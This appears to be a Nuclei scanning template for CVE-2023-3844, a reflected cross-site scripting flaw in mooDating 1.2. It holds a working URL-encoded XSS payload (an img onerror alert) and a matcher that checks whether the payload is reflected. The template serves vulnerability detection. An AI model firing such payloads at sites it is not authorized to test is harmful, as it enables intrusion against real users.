41 lines
1.6 KiB
YAML
41 lines
1.6 KiB
YAML
id: CVE-2023-3844
|
|
|
|
info:
|
|
name: MooDating 1.2 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3844
|
|
- https://vuldb.com/?ctiid.235195
|
|
- https://vuldb.com/?id.235195
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-3844
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00207
|
|
epss-percentile: 0.58445
|
|
cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: moosocial
|
|
product: moodating
|
|
tags: packetstorm,cve,cve2023,xss,moodating
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 404'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>r5c3m", "mooDating")'
|
|
condition: and
|
|
# digest: 4a0a00473045022062ee61bdb4e78b5890d5ed91692e5f94476ace23ac3e03fba580ad72e3c1f081022100d3297607e5ed6e00917ab43635aa136806f47d428950aa9afbbca77e131de8e0:922c64590222798bb761d5b6d8e72950 |